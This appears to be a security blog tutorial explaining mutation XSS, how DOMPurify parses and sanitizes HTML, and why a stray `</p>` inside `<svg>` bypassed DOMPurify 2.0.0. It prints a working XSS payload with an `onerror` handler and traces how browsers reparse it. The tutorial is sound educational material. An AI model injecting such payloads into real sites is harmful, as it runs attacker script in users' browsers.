What is mXSS?
- Due to parsing differences between sanitizers (e.g., DOMPurify) and browsers, input can be mutated (or transformed) when appended to the DOM tree using `innerHTML`.
- In simple terms, abusing these parsing differences is called mXSS (mutation XSS).
How Does an HTML Sanitizer Work?
- Parsing: The HTML content is parsed into a DOM tree, either on the server or in the browser.
- Sanitization: The sanitizer iterates through the DOM tree and removes any dangerous or harmful content.
- Serialization: After sanitizing, the DOM tree is serialized back into an HTML string.
- Re-parsing: The serialized HTML is assigned to `innerHTML`, triggering another parsing process.
- Appending to Document: Finally, the sanitized DOM tree is appended to the document.
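The steps above can be sketched as a small function. This only illustrates the flow and is not how any particular sanitizer is implemented: `sanitizeRoundTrip`, `browserSteps`, and the script-only cleaning rule are hypothetical names and simplifications, and the DOM-specific work is passed in so the order of the steps is easy to see.

```javascript
// Hypothetical sketch of the parse -> sanitize -> serialize flow.
function sanitizeRoundTrip(dirtyHtml, steps) {
  const tree = steps.parse(dirtyHtml); // 1. Parsing
  steps.sanitize(tree);                // 2. Sanitization (mutates the tree in place)
  return steps.serialize(tree);        // 3. Serialization
}

// One possible browser binding (assumption: runs in a page where DOMParser exists).
// The "sanitizer" here only removes <script> elements, far less than a real one does.
const browserSteps = {
  parse: (html) => new DOMParser().parseFromString(html, 'text/html'),
  sanitize: (doc) => doc.querySelectorAll('script').forEach((node) => node.remove()),
  serialize: (doc) => doc.body.innerHTML,
};

// 4. Re-parsing and 5. appending happen when the caller assigns the string:
// target.innerHTML = sanitizeRoundTrip(untrustedHtml, browserSteps);
```

The string returned by step 3 is parsed a second time in step 4, and that second parse is where a mutation can show up.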
DOMPurify – Behind The Scenes
A client-side JavaScript library used to sanitize HTML inputs and prevent XSS attacks.
Execution Flow
DOMPurify Internals
- `_initDocument`: Uses the DOMParser API to parse unsafe input into a DOM structure.
- `_createNodeIterator`: Uses `NodeIterator` to traverse each DOM node in order.
- Element checks:
  - Checks for DOM clobbering and known attack vectors like mXSS.
  - Removes or escapes disallowed tags (e.g., `<script>`, `<iframe>`, etc.).
- Template and Shadow DOM handling:
  - DOMPurify normally skips `<template>` and Shadow DOM.
  - A dedicated step recursively dives into those fragments and sanitizes them too.
- `_sanitizeAttributes`: Goes through each attribute (`onclick`, `href`, `src`, etc.) and strips or modifies malicious ones.
- `body.innerHTML`: After sanitization, the DOM is serialized back into clean HTML and reinserted into the page.
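To make the attribute step more concrete, here is a toy model of the idea. It is not DOMPurify's actual logic: the real `_sanitizeAttributes` works on live DOM nodes with configurable allow-lists, while this sketch uses a plain object and a tiny deny-list. `sanitizeAttributesSketch` and `URI_ATTRS` are names I made up for illustration.

```javascript
// Toy model only; names and rules are assumptions, not DOMPurify internals.
const URI_ATTRS = new Set(['href', 'src']);

function sanitizeAttributesSketch(attrs) {
  const clean = {};
  for (const [name, value] of Object.entries(attrs)) {
    const lower = name.toLowerCase();
    // Drop inline event handlers such as onclick or onerror.
    if (lower.startsWith('on')) continue;
    if (URI_ATTRS.has(lower)) {
      // Remove whitespace and control characters before checking the scheme.
      const compact = String(value).replace(/[\u0000-\u0020]/g, '').toLowerCase();
      if (compact.startsWith('javascript:')) continue;
    }
    clean[name] = value;
  }
  return clean;
}

console.log(sanitizeAttributesSketch({
  onclick: 'alert(1)',
  href: 'java\nscript:alert(1)',
  src: '/logo.png',
  id: 'hero',
}));
```

Only `src` and `id` survive here. Note that a check like this only helps if the sanitizer sees the same elements and attributes that the browser will see later, which is exactly the assumption mXSS breaks.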
Getting Our Hands Dirty
Let’s understand what mXSS is with a small example:
element.innerHTML = '<u>some <i> HTML'
After inserting using `innerHTML`, when we read the HTML back, it looks different from the input:
<u>
some
<i>HTML</i>
</u>
This happens because HTML is designed to be fault-tolerant.
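A quick way to watch this happen is to push markup through a parse-and-serialize round trip until it stops changing. The sketch below is only an illustration: `roundTripUntilStable` and `browserRoundTrip` are hypothetical helper names, and the browser binding assumes a page context with `document` available.

```javascript
// Hypothetical helper: apply a parse+serialize round trip until the markup
// stops changing, and return every intermediate form.
function roundTripUntilStable(html, roundTrip, maxPasses = 5) {
  const history = [html];
  for (let pass = 0; pass < maxPasses; pass++) {
    const current = history[history.length - 1];
    const next = roundTrip(current);
    if (next === current) break; // stable: no further mutation
    history.push(next);
  }
  return history;
}

// Assumed browser round trip: parse into a detached <template>, then serialize.
const browserRoundTrip = (html) => {
  const tpl = document.createElement('template');
  tpl.innerHTML = html;
  return tpl.innerHTML;
};
```

In a browser console, `roundTripUntilStable('<u>some <i> HTML', browserRoundTrip)` should return more than one entry, because the first round trip closes the open tags. Markup that yields a single entry survived the round trip unchanged.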
The svg Magic
element.innerHTML = '<svg><p>is this in svg?</svg>'
This gets parsed as:
<svg></svg>
<p>is this in svg?</p>
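Here, `<p>` is moved out of `<svg>`: a `<p>` start tag is not allowed inside SVG content, so the parser closes `<svg>` first and then inserts `<p>` as a regular HTML element.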
More Examples
- `<svg>` can’t have `<p>` as a child.
- `<form>` cannot contain a nested `<form>`.
- An HTML `<style>` treats everything inside as text, even if it looks like a tag.

[More such rules here](https://sonarsource.github.io/mxss-cheatsheet/).
The Escape
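element.innerHTML = '<svg></p>is this in svg?</svg>'
At the time of the DOMPurify 2.0.0 bypass, affected browsers parsed this into:
<svg>
<p></p>
is this in svg?
</svg>
Now mXSS is possible! The stray `</p>` turns into an empty `<p></p>` that stays inside `<svg>`, so a sanitizer such as DOMPurify treats everything after it as SVG content. But once that tree is serialized and parsed again, the browser sees a `<p>` start tag, leaves `<svg>`, and reads the rest as HTML.
`<svg></p>` becomes a base for mXSS payloads that look harmless inside `<svg>`.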
Example:
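<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
DOM becomes:
<svg>
<p></p>
<style>
<a id="</style><img src=1 onerror=alert(1)>"></a>
</style>
</svg>
Nothing executes at this stage, even though the payload contains an `onerror` handler. That’s because **`<svg>` switches the parser to foreign-content (XML-like) rules**, which behave differently: inside `<svg>`, the contents of `<style>` are parsed as markup rather than raw text, so `</style><img src=1 onerror=alert(1)>` is only the value of the `id` attribute on `<a>`.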
Abuse in DOMPurify v2.0.0
Payload:
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
- DOMPurify doesn’t strip the `onerror` handler because, in the tree it inspects, the `<img ...>` text is only part of the `id` attribute value of an `<a>` inside an SVG `<style>`; there is no `<img>` element to sanitize.
- But when the sanitized output is inserted into the DOM using `innerHTML`, the browser parses it differently:
<svg></svg>
<p></p>
<style><a id="</style>
<img src="1" onerror="alert(1)">
">
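To see why the second parse exposes the `<img>`, here is a deliberately simplified model of how an HTML (not SVG) `<style>` element finds its end. It is not a real HTML parser: `splitAtHtmlStyleEnd` is a hypothetical helper that only mimics the raw-text rule, where the content ends at the first `</style` followed by whitespace, `/`, or `>`, even if that sequence sits inside what used to be an attribute value.

```javascript
// Simplified model of HTML raw-text handling for <style>; NOT a real parser.
// Input: the markup that follows an HTML <style> start tag.
function splitAtHtmlStyleEnd(afterStyleOpen) {
  // Raw text ends at "</style" followed by whitespace, "/" or ">".
  const match = /<\/style(?=[\t\n\f\r \/>])/i.exec(afterStyleOpen);
  if (!match) return { rawText: afterStyleOpen, rest: '' };
  // Simplification: treat the next ">" as the end of the closing tag.
  const tagEnd = afterStyleOpen.indexOf('>', match.index);
  return {
    rawText: afterStyleOpen.slice(0, match.index),
    rest: tagEnd === -1 ? '' : afterStyleOpen.slice(tagEnd + 1),
  };
}

// What follows "<style>" in the serialized, sanitized output:
const serialized = '<a id="</style><img src=1 onerror=alert(1)>"></a></style></svg>';
const { rawText, rest } = splitAtHtmlStyleEnd(serialized);
console.log(rawText); // <a id="
console.log(rest);    // <img src=1 onerror=alert(1)>"></a></style></svg>
```

Everything in `rest` is handed back to the normal HTML tokenizer, so the `<img>` with its `onerror` handler becomes a real element.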
Why Does `<svg>` Close Early?
Even though we expected it to close at the end, the `<p>` start tag in the serialized output causes the parser to exit "foreign content mode."
- According to § 13.2.6.5 (parsing tokens in foreign content) of the HTML specification, when the parser is inside a foreign element (like `<svg>`) and sees a start tag that isn’t allowed there (like `<p>`), it exits the foreign mode.
- It pops `<svg>` off the stack of open elements and reprocesses that tag (`<p>`) in HTML mode, continuing normally. The `<style>` that follows is therefore an HTML `<style>`, whose raw-text content ends at the first `</style>`.
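The breakout rule can be written down as a small lookup. The tag list below is my transcription of the start tags named in the specification's foreign-content rules, so please check it against the current spec text before relying on it. `breaksOutOfForeignContent` is a hypothetical helper, and it ignores finer points such as integration points and end tags.

```javascript
// Start tags that make the HTML parser leave foreign content (SVG/MathML),
// transcribed from the HTML specification's foreign-content rules.
const BREAKOUT_START_TAGS = new Set([
  'b', 'big', 'blockquote', 'body', 'br', 'center', 'code', 'dd', 'div',
  'dl', 'dt', 'em', 'embed', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'head',
  'hr', 'i', 'img', 'li', 'listing', 'menu', 'meta', 'nobr', 'ol', 'p',
  'pre', 'ruby', 's', 'small', 'span', 'strong', 'strike', 'sub', 'sup',
  'table', 'tt', 'u', 'ul', 'var',
]);

// <font> only breaks out when it carries one of these attributes.
const FONT_BREAKOUT_ATTRS = ['color', 'face', 'size'];

function breaksOutOfForeignContent(tagName, attrNames = []) {
  const name = tagName.toLowerCase();
  if (name === 'font') {
    return attrNames.some((attr) => FONT_BREAKOUT_ATTRS.includes(attr.toLowerCase()));
  }
  return BREAKOUT_START_TAGS.has(name);
}

console.log(breaksOutOfForeignContent('p'));     // true
console.log(breaksOutOfForeignContent('style')); // false
```

`<p>` is on the list, while `<style>` and `<a>` are not, which is why they can live inside `<svg>` during the first parse and only turn into HTML elements after something else has closed `<svg>`.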
Bonus:
ChatGPT is my friend 😄 – See my chat with it